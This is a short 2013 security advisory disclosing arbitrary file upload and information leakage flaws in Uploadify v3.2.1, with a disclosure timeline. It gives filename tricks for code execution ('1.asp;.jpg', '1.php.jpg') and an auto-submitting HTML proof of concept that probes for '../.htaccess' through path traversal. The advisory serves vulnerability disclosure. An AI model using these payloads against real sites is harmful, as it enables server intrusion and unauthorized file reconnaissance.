These are Arbitrary File Uploading and Information Leakage vulnerabilities in Uploadify. The same as in June with previous vulnerabilities in Uploadify, in September the developers just ignored my warnings, even I sent letter to multiple their e-mail addresses.
Vulnerable are Uploadify v3.2.1 and previous versions.
Reactive Apps http://www.uploadify.com
Arbitrary File Uploading (WASC-31):
Code Execution attack via file uploading. There are two methods of code execution: by using of symbol ";" (1.asp;.jpg) in file name (IIS) and by double extension (1.php.jpg) (Apache with special configuration).
Information Leakage (WASC-13):
Checking arbitrary file existence at the server.
<html> <head> <title>Uploadify Information Leakage exploit (C) 2013 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/uploadify/check-exists.php" method="post"> <input type="hidden" name="filename" value="../.htaccess"> </form> </body> </html>
2013.09.20 - announced at my site. 2013.09.21 - informed developers on multiple e-mails. 2013.10.24 - disclosed at my site (http://websecurity.com.ua/6777/).
Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua